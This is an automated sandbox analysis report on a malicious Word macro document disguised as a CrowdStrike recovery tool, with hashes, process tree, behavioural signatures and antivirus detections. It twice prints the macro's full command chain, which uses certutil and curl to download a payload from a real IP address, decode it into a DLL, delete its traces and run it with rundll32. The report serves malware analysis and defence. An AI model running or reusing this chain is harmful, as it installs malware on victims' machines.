Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 23, 2024, 9:03 a.m.	July 23, 2024, 9:05 a.m.

Size	302.9KB
Type	Microsoft Word 2007+
MD5	`dd2100dfa067caae416b885637adc4ef`
SHA256	`803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61`
CRC32	`5FEB8C8B`
ssdeep	`6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8`
Yara	docx - Word 2007 file format detection zip_file_format - ZIP file format Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
2552
- cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp & certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe & C:\Users\test22\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\curl.txt & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
  2708
  - xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp
    2780
  - certutil.exe certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt
    2824
  - certutil.exe certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe
    2868
  - certutil.exe certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll
    2924
  - rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain
    2972

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 23, 2024, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 23, 2024, 9:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 23, 2024, 9:03 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 23, 2024, 9:03 a.m.			0	0
IsDebuggerPresent July 23, 2024, 9:03 a.m.			0	0
IsDebuggerPresent July 23, 2024, 9:03 a.m.			0	0

Command line console output was observed (16 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: 'C:\Users\test22\AppData\Local\Temp\curl.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: Could Not Find C:\Users\test22\AppData\Local\Temp\curl.exe console_handle: 0x0000000b	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: Could Not Find C:\Users\test22\AppData\Local\Temp\curl.txt console_handle: 0x0000000b	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: Could Not Find C:\Users\test22\AppData\Local\Temp\curl.exe console_handle: 0x0000000b	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: Could Not Find C:\Users\test22\AppData\Local\Temp\mscorsvc.txt console_handle: 0x0000000b	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: File not found - curl.exe console_handle: 0x00000017	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: 0 File(s) copied console_handle: 0x00000013	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: DecodeFile returned The system cannot find the file specified. 0x80070002 (WIN32: 2) console_handle: 0x00000007	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: CertUtil: -encode command FAILED: 0x80070002 (WIN32: 2) console_handle: 0x00000007	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: CertUtil: The system cannot find the file specified. console_handle: 0x00000007	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: DecodeFile returned The system cannot find the file specified. 0x80070002 (WIN32: 2) console_handle: 0x00000007	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: CertUtil: -decode command FAILED: 0x80070002 (WIN32: 2) console_handle: 0x00000007	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: CertUtil: The system cannot find the file specified. console_handle: 0x00000007	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: DecodeFile returned The system cannot find the file specified. 0x80070002 (WIN32: 2) console_handle: 0x00000007	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: CertUtil: -decode command FAILED: 0x80070002 (WIN32: 2) console_handle: 0x00000007	1	1
WriteConsoleW July 23, 2024, 9:03 a.m.	buffer: CertUtil: The system cannot find the file specified. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 23, 2024, 9:03 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 23, 2024, 9:03 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25 rundll32+0x135c @ 0x4f135c rundll32+0x1901 @ 0x4f1901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x75ac3ef4 registers.esp: 2356468 registers.edi: 0 registers.eax: 11832008 registers.ebp: 2356496 registers.edx: 1 registers.ebx: 0 registers.esi: 6336656 registers.ecx: 1853830620	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 23, 2024, 9:03 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25
rundll32+0x135c @ 0x4f135c
rundll32+0x1901 @ 0x4f1901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75ac3ef4
registers.esp: 2356468
registers.edi: 0
registers.eax: 11832008
registers.ebp: 2356496
registers.edx: 1
registers.ebx: 0
registers.esi: 6336656
registers.ecx: 1853830620

Allocates read-write-execute memory (usually to unpack itself) (14 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x65001000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e3b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e1a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e1a4000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x058f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x058f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x507c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c9b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e095000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fbc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2868 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fbc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 23, 2024, 9:03 a.m.	process_identifier: 2924 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fbc2000 process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile July 23, 2024, 9:03 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000003ec filepath: C:\Users\test22\AppData\Local\Temp\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp & certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe & C:\Users\test22\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\curl.txt & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain & exit

Word document hooks document open

Yara rule detected in process memory (32 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

Creates suspicious VBA object (1 event)

com_class

WScript.Shell

May attempt to create new processes

One or more non-whitelisted processes were created (1 event)

parent_process

winword.exe

martian_process

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2708 resumed a thread in remote process 2972
NtResumeThread July 23, 2024, 9:03 a.m.	thread_handle: 0x00000090 suspend_count: 0 process_identifier: 2972	1	0	0

File has been identified by 33 AntiVirus engines on VirusTotal as malicious (33 events)

Lionic	Trojan.MSWord.EmoDldr.4!c
CAT-QuickHeal	O97M.Downloader.36753
Skyhigh	Artemis!Trojan
VIPRE	VB.Heur2.EmoDldr.5.CF3D710B.Gen
Sangfor	VBA.Sus.Obf
BitDefender	VB.Heur2.EmoDldr.5.CF3D710B.Gen
Arcabit	HEUR.VBA.A.1
VirIT	Office.VBA_Macro_Heur
Symantec	CL.Downloader!gen106
Avast	VBA:Downloader-FWG [Trj]
Kaspersky	UDS:DangerousObject.Multi.Generic
Alibaba	Trojan:Script/modification.4b5b90cf
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
MicroWorld-eScan	VB.Heur2.EmoDldr.5.CF3D710B.Gen
Rising	Malware.Obfus/VBA@AI.89 (VBA)
Emsisoft	VB.Heur2.EmoDldr.5.CF3D710B.Gen (B)
F-Secure	Malware.VBA/AVI.Downloader.ykcxs
DrWeb	modification of W97M.Suspicious.1
TrendMicro	Trojan.W97M.DOWNLOADER.E
FireEye	VB.Heur2.EmoDldr.5.CF3D710B.Gen
Ikarus	Win32.Outbreak
Google	Detected.Heuristic.Script
Avira	W2000M/AVI.Downloader.psxmr
Antiy-AVL	Trojan[Downloader]/MSOffice.Agent
Kingsoft	Win32.Troj.Undef.a
ViRobot	DOC.Z.Agent.310160
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	VB.Heur2.EmoDldr.5.CF3D710B.Gen
Varist	PP97M/Downldr.GC.gen!Eldorado
TACHYON	Suspicious/WOX.XSR.Gen
MAX	malware (ai score=88)
AVG	VBA:Downloader-FWG [Trj]
alibabacloud	Trojan:MSOffice/Heur2.Etd!iyn

The process winword.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe

New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All